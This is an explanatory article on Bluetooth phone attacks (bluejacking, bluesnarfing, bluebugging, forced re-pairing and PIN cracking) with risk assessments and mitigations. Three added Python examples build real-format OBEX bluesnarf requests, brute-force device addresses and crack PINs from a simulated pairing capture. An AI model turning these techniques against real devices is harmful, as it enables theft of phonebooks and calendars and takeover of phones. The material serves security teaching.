Is Bluetooth secure? Inquiring minds want to know. Ever since the first Bluetooth-enabled mobile phones started appearing a couple of years ago, numerous reports have suggested that the wireless technology is vulnerable to snooping.
First, the popular press jumped onto bluejacking, which lets complete strangers send anonymous and unsolicited messages to certain Bluetooth phones. Then came reports that some phones were vulnerable to bluesnarfing, which makes it possible for someone to access a phone wirelessly without the owner's knowledge and download the stored phonebook and calendar and sometimes more. More recently, reports have described bluebugging, in which someone can theoretically take complete wireless control of virtually any Bluetooth phone and use it for all kinds of illicit purposes.
What the articles don't tell you, though, is just how unlikely it is for any of these bluesomething attacks to affect you. Some early Bluetooth phones did have security holes, but they were due to faulty implementations, not weaknesses in Bluetooth itself, and the phones' manufacturers have since released firmware upgrades that fix them. Also, the more serious attacks, such as bluesnarfing and bluebugging, require hardware, software, and know-how that are beyond the reach of just about everyone except professional spies or the most obsessed privacy snoops.
This isn't to say, of course, that Bluetooth is absolutely, totally secure. The jury is still out, actually, on just how secure Bluetooth is. There's scant evidence, however, that the likes of bluejacking, bluesnarfing, and bluebugging have caused any real problems, although the Bluetooth attackers seem to get more numerous and more sophisticated day by day.
One thing that has become clear, though, is that Bluetooth security and user convenience involve some serious tradeoffs. Some of the first Bluetooth mobile phones from Nokia, for example, made it very easy to connect to other Bluetooth devices, such as headsets. Their default settings turned Bluetooth on and set it to "visible" or "discoverable" mode, a necessary condition for connecting. Unfortunately, such visible phones were also visible to bluejackers and bluesnarfers, who didn't hesitate to "discover" them. Also, the designers of some early phones, in an attempt to make life simpler for users, didn't require user input of a PIN in certain situations where they thought it wouldn't be necessary. Again, the result was bluejacking and bluesnarfing.
Bluejacking, the earliest Bluetooth attack, is a good example of how security and user convenience affect each other. The most common method of bluejacking works via the process of sending an electronic business card, a good feature to have at business meetings and trade shows. Bluejackers alter the card-passing procedure, though, so that the business card appears as a short message, and then they choose a nearby discoverable Bluetooth phone to send it to. People with phones in nondiscoverable mode avoid being bluejacked, but they have to perform the extra step of turning on discoverability in order to receive a legitimate business card.
Bluejacking is very easy to do. It begins with the creation of a new contact in a bluejacker's own phonebook, but in the name field, instead of typing a person's name, the bluejacker types a short message. Then it's simply a matter of choosing a nearby Bluetooth phone (on a subway or in a shopping mall, for example) to send it to. Phones that are in discoverable mode, and thus available to be bluejacked, appear on the display of the bluejacker's phone. After choosing one, perhaps at random, the bluejacker sends the ersatz business card, and the contact "name" (the message) pops up on the bluejacked phone.
Because bluejacking is so easy, it has become almost a fad in Europe, where the first Bluetooth phones were sold. Creative bluejackers have a knack for making it amusing, and some even initiate casual sexual encounters in a wireless ritual called "toothing." Apparently, not all bluejack targets mind the intrusion.
But phone makers, of course, don't find bluejacking amusing, and having been burned by bad publicity, they now stress security over easy connectivity. No recently introduced phones, for example, set Bluetooth on and discoverable at startup or even remain in discoverable mode for very long at any time. If a user puts a phone in discoverable mode in order to pair with another device, the phone will stay discoverable only for a short time, typically one to five minutes. Some, but not all, of the first Bluetooth phones behaved this way; now they all do.
As with bluejacking, being nondiscoverable also helps a Bluetooth mobile phone avoid bluesnarfing, an invasion of privacy that's much more damaging. With bluesnarfing, you can wirelessly connect to some early Bluetooth phones without the phone owner's knowledge and download the phonebook, the calendar, and sometimes more. An advanced version of bluesnarfing can even alter those files in some bluesnarfed phones.
Bluesnarfing is not a simple procedure, however, and software assistance is necessary to pull it off. Initially, the software required a laptop to run it, so a bluesnarfer within Bluetooth's short range was at risk of being noticed. Now, however, bluesnarfing software written in Java can run on any J2ME-enabled cell phone, which is less likely to draw suspicion.
A primary means of bluesnarfing is a program called Blooover. (The name, a combination of Bluetooth and Hoover, was chosen because the program sucks up information much as a Hoover vacuum cleaner sucks up dirt.) Blooover was written by Martin Herfurt, a researcher at Salzburg Research Forschungsgesellschaft m.b.H. and a lecturer at the University of Salzburg. Earlier work in defining the bluesnarf vulnerability was done by Adam Laurie, then with U.K.-based A.L. Digital and now chief security officer of The Bunker Secure Hosting Ltd., and by Marcel Holtmann, a Bluetooth and Linux expert. Herfurt, Laurie, and Holtmann are all members of the Bluetooth SIG Security Expert Group.
As explained in a presentation by Laurie, Holtmann, and Herfurt earlier this year, bluesnarfing works, as does bluejacking, through the mechanism for exchanging business cards. Using the OBEX protocol, which is commonly used for such exchanges, the bluesnarfing software connects to a target Bluetooth device via Bluetooth's Object Push profile. Then, however, instead of pushing a business card, it pulls, issuing an OBEX GET request for objects with known names, such as the phonebook (telecom/pb.vcf) or the calendar (telecom/cal.vcs). Those names come from the IrMC synchronization specification, and a service that exists only to receive pushed cards has no business serving them.
What makes bluesnarfing possible in this situation is the way the Object Push profile was implemented in some early Bluetooth phones from Nokia and Sony Ericsson. One particular shortcoming was the failure to require authentication of another Bluetooth device that attempts to perform a push, which made these phones easy targets. Normally, two Bluetooth devices exchange information only after an authentication procedure that depends on the same PIN having been entered on both devices. But the designers of some phones, apparently thinking that users wouldn't want to exchange and type PINs for a simple exchange of business cards, omitted authentication, and the same unauthenticated service also answered GET requests it should have refused. Firmware upgrades that correct the problem are now available, but many phone owners haven't installed them.
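The two OBEX exchanges described above, the bluejack push and the bluesnarf pull, look almost identical on the wire, which is the point. The following is an added example, not code from the article or from Blooover: it builds both requests as real OBEX packets (opcode, length, length-prefixed Name and Type headers), parses them, and runs them against a toy phone-side Object Push handler in two configurations. With `snarfable=True` the handler behaves like the early firmware and answers any named GET; with `snarfable=False` it accepts pushes and the one pull Object Push actually defines (the owner's own card) and refuses everything else. The phone contents and addresses are constructed for the demo.

```python
"""OBEX Object Push as seen from both sides of a bluejack and a bluesnarf.
Added example: constructed packets and a toy phone-side service, not code
from the original article or from Blooover."""
import struct

# OBEX opcodes (final bit set) and response codes used here
PUT, GET = 0x82, 0x83
OK, FORBIDDEN, NOT_IMPLEMENTED = 0xA0, 0xC3, 0xD1
# OBEX header identifiers: Name (UTF-16), Type (bytes), End-of-Body (bytes)
HI_NAME, HI_TYPE, HI_END_OF_BODY = 0x01, 0x42, 0x49


def hdr_unicode(hi, text):
    """Unicode header: HI, 2-byte total length, UTF-16BE text, 2-byte null."""
    payload = text.encode("utf-16-be") + b"\x00\x00"
    return struct.pack(">BH", hi, 3 + len(payload)) + payload


def hdr_bytes(hi, data):
    """Byte-sequence header: HI, 2-byte total length, raw bytes."""
    return struct.pack(">BH", hi, 3 + len(data)) + data


def packet(opcode, *headers):
    """OBEX request or response: opcode, 2-byte total length, then headers."""
    body = b"".join(headers)
    return struct.pack(">BH", opcode, 3 + len(body)) + body


def vcard(name):
    return ("BEGIN:VCARD\r\nVERSION:2.1\r\nN:%s\r\nFN:%s\r\nEND:VCARD\r\n"
            % (name, name)).encode()


def bluejack_put(message):
    """A bluejack is an ordinary business-card push whose name is the message."""
    return packet(PUT, hdr_unicode(HI_NAME, "card.vcf"),
                  hdr_bytes(HI_TYPE, b"text/x-vCard\x00"),
                  hdr_bytes(HI_END_OF_BODY, vcard(message)))


def bluesnarf_get(path):
    """A bluesnarf sends GET, not PUT, to the same push service, naming an
    IrMC object such as telecom/pb.vcf."""
    return packet(GET, hdr_unicode(HI_NAME, path),
                  hdr_bytes(HI_TYPE, b"text/x-vCard\x00"))


def parse(data):
    """Split an OBEX packet into (opcode, {header id: value})."""
    opcode, length = struct.unpack(">BH", data[:3])
    if length != len(data):
        raise ValueError("length field does not match packet size")
    headers, pos = {}, 3
    while pos < length:
        hi = data[pos]
        cls = hi & 0xC0                      # top two bits give the encoding
        if cls == 0x80:                      # single-byte value
            value, hlen = data[pos + 1], 2
        elif cls == 0xC0:                    # four-byte value
            value, hlen = struct.unpack(">I", data[pos + 1:pos + 5])[0], 5
        else:                                # unicode (0x00) or bytes (0x40)
            hlen = struct.unpack(">H", data[pos + 1:pos + 3])[0]
            value = data[pos + 3:pos + hlen]
            if cls == 0x00:
                value = value.decode("utf-16-be").rstrip("\x00")
        headers[hi] = value
        pos += hlen
    return opcode, headers


# Constructed phone contents reachable through the push service
OWNER_CARD = vcard("Phone Owner")
PHONE_FILES = {
    "telecom/pb.vcf": vcard("Alice Example") + vcard("Bob Example"),
    "telecom/cal.vcs": b"BEGIN:VCALENDAR\r\nVERSION:1.0\r\nEND:VCALENDAR\r\n",
}


def push_service(request, snarfable):
    """Phone-side Object Push handler. Returns (response packet, data leaked).
    snarfable=True models the early firmware that answered any named GET
    without authentication; snarfable=False accepts pushes and the owner's
    own card (the one pull Object Push defines) and refuses everything else."""
    opcode, headers = parse(request)
    if opcode == PUT:
        return packet(OK), None              # card stored, user sees it arrive
    if opcode == GET:
        name = headers.get(HI_NAME)
        if name is None:                     # default business-card pull
            return packet(OK, hdr_bytes(HI_END_OF_BODY, OWNER_CARD)), OWNER_CARD
        if snarfable and name in PHONE_FILES:
            leaked = PHONE_FILES[name]
            return packet(OK, hdr_bytes(HI_END_OF_BODY, leaked)), leaked
        return packet(FORBIDDEN), None
    return packet(NOT_IMPLEMENTED), None


if __name__ == "__main__":
    for fixed in (False, True):
        resp, leaked = push_service(bluesnarf_get("telecom/pb.vcf"), snarfable=not fixed)
        print("patched" if fixed else "early firmware", hex(resp[0]), leaked)
```

The check a practitioner can take from this is simple: an Object Push service that returns anything other than the owner's card to a GET, without a prior authenticated pairing, is serving files it was never meant to.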
Like bluejacking, bluesnarfing aims at phones that are in discoverable mode, but it can also work, in theory, against certain phones that aren't. To succeed against a nondiscoverable phone, bluesnarfing software needs to address the phone by its unique 48-bit Bluetooth device address (the BD_ADDR), and coming up with that address is sometimes possible with software assistance. A program called RedFang, written by Ollie Whitehouse of U.K.-based @stake, does the job (sometimes) with what's basically a brute-force approach: it tries every possible address and notes which ones get a response.
The main difficulty with discovering nondiscoverable Bluetooth devices is that the process can take hours of computing time. Whitehouse noted in an October 2003 research report, however, that it's sometimes possible to shorten the time by "seeding" the procedure with intelligent guesses. The upper 24 bits of a Bluetooth address are the manufacturer's IEEE-assigned prefix, for example, so an attacker who can guess the make of the phone has only the lower 24 bits left to search. Even so, the approach can still take a long time. Also, Bluetooth specification 1.2, released soon after Whitehouse's report, was meant to address the weakness that allows the brute-force approach with an anonymity mode that masks Bluetooth radios' physical addresses.
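To make the seeding argument concrete, here is an added example (not RedFang's code, and not from the article) that enumerates candidate addresses manufacturer-prefix first and measures how many probes a search costs. The radio probe is simulated by a function that answers only for one constructed hidden address; the prefix 00:02:EE is just a value chosen for the demo and is not a claim about any vendor.

```python
"""Address brute force against a nondiscoverable device, seeded by manufacturer
prefix. Added example modelled on the approach the article attributes to
RedFang; the probe is simulated so the block runs without a radio."""


def candidate_addresses(oui_prefixes):
    """Yield 48-bit BD_ADDRs as integers, most likely manufacturers first.
    The top 24 bits of an address are the IEEE-assigned manufacturer prefix
    (OUI); guessing the make leaves 2**24 low addresses to try per guess
    instead of 2**48 for the whole space."""
    for oui in oui_prefixes:
        high = int(oui.replace(":", ""), 16) << 24
        for low in range(1 << 24):
            yield high | low


def fmt_addr(addr):
    """Render an integer address in the usual colon-separated hex form."""
    return ":".join("%02X" % ((addr >> (8 * i)) & 0xFF) for i in range(5, -1, -1))


def brute_force(probe, oui_prefixes, limit=None):
    """Probe candidates in order; return (address, attempts) for the first
    that answers, or (None, attempts) once `limit` probes have been spent."""
    attempts = 0
    for addr in candidate_addresses(oui_prefixes):
        if limit is not None and attempts >= limit:
            break
        attempts += 1
        if probe(addr):
            return fmt_addr(addr), attempts
    return None, attempts


def worst_case_hours(address_bits, seconds_per_probe):
    """Time to exhaust a space of 2**address_bits with a single radio."""
    return (1 << address_bits) * seconds_per_probe / 3600


# Constructed target: a phone hidden from inquiry. The prefix 00:02:EE is
# just a value chosen for the demo, not a claim about any vendor.
HIDDEN_PHONE = int("0002EE000007", 16)


def simulated_probe(addr):
    """Stands in for sending a remote-name request to a guessed address and
    waiting for either a reply or a timeout."""
    return addr == HIDDEN_PHONE


if __name__ == "__main__":
    found, tries = brute_force(simulated_probe, ["00:02:EE"])
    print(found, "after", tries, "probes")
    print("one prefix, 10 s per probe: %.0f hours" % worst_case_hours(24, 10))
    print("full 48-bit space, 10 s per probe: %.2e hours" % worst_case_hours(48, 10))
```

The ratio between the two `worst_case_hours` figures is exactly 2**24, which is what a good manufacturer guess buys; a wrong guess buys nothing, which is why `brute_force` takes a `limit` so that a search can be abandoned and reseeded.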
Bluebugging goes well beyond bluejacking and bluesnarfing, allowing virtually complete takeover of a phone. A bluebugger can wirelessly direct a phone to make calls without the owner's knowledge, for example, after which the phone works as a bugging device, picking up conversations in its immediate area. Similarly, a bluebugger can set call forwarding and then receive calls intended for the bluebug victim. Bluebuggers also have bluesnarf capability, so they can read phonebooks and calendars and more. They can even read a phone's call list to see whom their victims called or who called them, and alter those lists as well.
Fortunately, only a few early models of Bluetooth phones are vulnerable to bluebugging. Their Bluetooth implementations were faulty and have since been corrected with new firmware. Some reports have pointed out a way that bluebugging can also succeed against other phones, but that method requires the owner of the target phone to more or less play the sucker. Basically, the bluebugger talks the victim into handing over the phone, manipulates it to set up a "backdoor" for later attack, and then hands it back.
The phones that are inherently vulnerable to bluebugging can be commandeered without physical contact. As with bluejacking and bluesnarfing, the process sometimes begins with the pushing of an electronic business card. On a few early Motorola phones, for example, someone could send a business card using a procedure that, for convenience, didn't require authentication or PIN entry. Then, due to flaws in the phones' Bluetooth implementations, a bluebugger could interrupt the sending process, and the bluebugger's phone would remain listed in the victim's phone as a "trusted" device. Having made it that far, the bluebugger could then connect to the phone's headset service, the serial channel over which a real headset talks to the phone, and issue the same AT commands a headset can, such as the command to dial a number. Those commands are what control the phone.
With newer phones, and with older phones that have been fixed with firmware upgrades, bluebugging becomes much more difficult. As noted in a presentation given in April of last year by Whitehouse, it can be done, but it requires special hardware and lots of computing power, and it's not practical when users employ PINs of more than a few digits.
What Whitehouse suggested last year is the use of a Bluetooth "sniffer," to monitor traffic between Bluetooth devices, plus some number crunching to recover a user PIN from that traffic. A sniffer records Bluetooth packets and can decode the packets to determine the information contained in them. If you capture packets that are involved in the process of authenticating two Bluetooth devices, you can use information from those packets to determine the user PIN. The packet data doesn't contain the PIN itself, but it contains information derived from the PIN. With some number crunching, you can recover the PIN, and then you're in.
But there are some real difficulties with this approach. First of all, a Bluetooth sniffer is special, expensive gear; you can't just walk into Circuit City and buy one. Also, the required number crunching can be prohibitive. In his presentation last year, Whitehouse estimated that an 850-MHz Pentium III could recover a 6-digit PIN in 12.5 seconds, but it would need nearly 4000 years for a 16-digit PIN.
Another difficulty with PIN cracking is that the sniffer has to intercept a pairing process, as when a Bluetooth phone initially connects to a Bluetooth headset. But pairings seldom occur in public places. Most people pair their headset and their phone once, usually at home or in an office, and the two devices then "trust" each other, so no further pairing is necessary.
In June of this year, however, two Israeli researchers proposed a way to force a pairing, which would make PIN cracking more predictable. According to Avishai Wool and Yaniv Shaked, both of Tel Aviv University, a bluebugger pretends to be one of two Bluetooth devices that have already paired with each other. The bluebugger does this by spoofing that device's Bluetooth address (BD_ADDR), which appears in every packet a sniffer captures. The spoofed device tells the other of the two that it has somehow lost the link key, the shared secret that lets the two devices know they can trust each other. Because a shared link key is essential to communicating, the other device then discards its own link key and initiates a pairing process to create a new one. The new pairing requires PIN entry on both devices, which gives the bluebugger an opportunity to sniff the exchange and eventually recover the PIN.
But even a forced pairing doesn't make it easy to recover a PIN. For one thing, a bluebugger still faces the same number-crunching obstacles described earlier by Whitehouse. Shaked and Wool note that a 3-GHz Pentium 4 can crack a 4-digit PIN in 63 msec, or a 6-digit PIN in about seven seconds. Each additional digit multiplies the search tenfold, so a 7-digit PIN takes over a minute, and longer PINs take proportionally longer.
Another difficulty with this approach, as noted by Wool and Shaked, is that it "requires the attacker to inject a specific message at a precise point in the protocol. This most likely needs a custom Bluetooth device since off-the-shelf components will be unable to support such behavior." Also, if such an attack forces a new pairing, the owner or owners of the attacked devices might decide to postpone pairing until there's an opportunity to do it in private.
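The PIN-cracking half of the attack described in the preceding paragraphs (Whitehouse's sniff-and-crunch, which a Shaked and Wool forced re-pairing only makes easier to trigger) can be shown end to end. What follows is an added example, not code from the article or from any of the researchers named: `pairing` runs the pairing and the first authentication as the two devices do it and returns only the values that travel over the air, and `crack_pin` recomputes the victims' key derivation for every candidate PIN until the sniffed SRES matches. One assumption is made so the block runs stand-alone: the real Bluetooth primitives E22, E21 and E1 are built on the SAFER+ cipher, and here each is replaced by an HMAC-SHA256 stand-in with the same inputs and output sizes. The device addresses are constructed.

```python
"""Recovering a PIN from a sniffed pairing. Added example, not code from the
article or from Whitehouse, Shaked or Wool. The real Bluetooth primitives
E22, E21 and E1 are built on SAFER+; here each is replaced by HMAC-SHA256
(an assumption made so the block runs stand-alone). What the sniffer
captures and what the cracker recomputes follow the pairing flow itself."""
import hashlib
import hmac
import itertools
import os


def prf(label, key, *parts):
    h = hmac.new(key, label, hashlib.sha256)
    for p in parts:
        h.update(p)
    return h.digest()[:16]


def e22(pin, bd_addr, in_rand):       # Kinit from the PIN, an address and IN_RAND
    return prf(b"E22", pin, bd_addr, in_rand)


def e21(lk_rand, bd_addr):            # one device's contribution to the link key
    return prf(b"E21", lk_rand, bd_addr)


def e1(link_key, bd_addr, au_rand):   # 32-bit SRES answering an AU_RAND challenge
    return prf(b"E1", link_key, bd_addr, au_rand)[:4]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


# Constructed device addresses for the demo (not real devices)
ADDR_A = bytes.fromhex("001122334455")   # the phone
ADDR_B = bytes.fromhex("66778899AABB")   # the headset


def pairing(pin, addr_a=ADDR_A, addr_b=ADDR_B):
    """Run pairing plus the first authentication as the two devices do it, and
    return only the values that travel over the air, i.e. what a sniffer sees.
    A forced re-pairing simply makes this exchange happen while the attacker
    is listening."""
    in_rand = os.urandom(16)                      # sent in the clear by A
    kinit = e22(pin, addr_b, in_rand)             # both sides: same PIN
    lk_rand_a, lk_rand_b = os.urandom(16), os.urandom(16)
    sent_a = xor(lk_rand_a, kinit)                # combination-key exchange,
    sent_b = xor(lk_rand_b, kinit)                # each half masked with Kinit
    link_key = xor(e21(lk_rand_a, addr_a), e21(lk_rand_b, addr_b))
    au_rand = os.urandom(16)                      # A challenges B ...
    sres = e1(link_key, addr_b, au_rand)          # ... and B answers
    return {"addr_a": addr_a, "addr_b": addr_b, "in_rand": in_rand,
            "sent_a": sent_a, "sent_b": sent_b, "au_rand": au_rand, "sres": sres}


def crack_pin(capture, digits):
    """Try every numeric PIN of the given length against the capture. Each guess
    redoes the victims' computation; the sniffed SRES is the oracle."""
    for guess in itertools.product("0123456789", repeat=digits):
        pin = "".join(guess).encode()
        kinit = e22(pin, capture["addr_b"], capture["in_rand"])
        lk_rand_a = xor(capture["sent_a"], kinit)
        lk_rand_b = xor(capture["sent_b"], kinit)
        link_key = xor(e21(lk_rand_a, capture["addr_a"]),
                       e21(lk_rand_b, capture["addr_b"]))
        if e1(link_key, capture["addr_b"], capture["au_rand"]) == capture["sres"]:
            return pin.decode()
    return None


def worst_case_seconds(digits, guesses_per_second):
    """Exhaustive search grows tenfold per digit; that growth is the defence."""
    return 10 ** digits / guesses_per_second


if __name__ == "__main__":
    cap = pairing(b"8631")
    print("recovered PIN:", crack_pin(cap, 4))
    for n in (4, 6, 7, 10):
        print("%2d digits: %.1f s at 1e5 guesses/s" % (n, worst_case_seconds(n, 1e5)))
```

Note what the cracker never needs: the PIN itself is never transmitted, and neither is the link key. IN_RAND, the two masked LK_RAND values, AU_RAND and the 32-bit SRES are enough, and all of them are sent in the clear during pairing. That is why the only two levers the user has are PIN length and not pairing where a sniffer can hear.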
So, then, Bluetooth's vulnerability comes down to a few key points:
- Early, faulty Bluetooth implementations, since corrected.
- Users choosing short PINs that are easy to crack with brute-force computing.
- Users unwisely pairing Bluetooth devices in public places.
- Motivated, dedicated privacy snoops willing and able to use special, and sometimes expensive, hardware and software.
And, of course, user convenience. It's easier for users to leave Bluetooth turned on and discoverable. It's easier to use a short PIN than a long one.
But users concerned about security will give up a little convenience to get it. And, increasingly, manufacturers of Bluetooth phones, understanding the tradeoff between security and convenience, will design their phones in ways that push users toward security. They don't want to be accused of marketing vulnerable technology, after all. They've had enough of that already.
About the Author
Gary Legg is a Boston-based freelance writer. He holds a BSEE degree and is a former editor and executive editor of EDN magazine.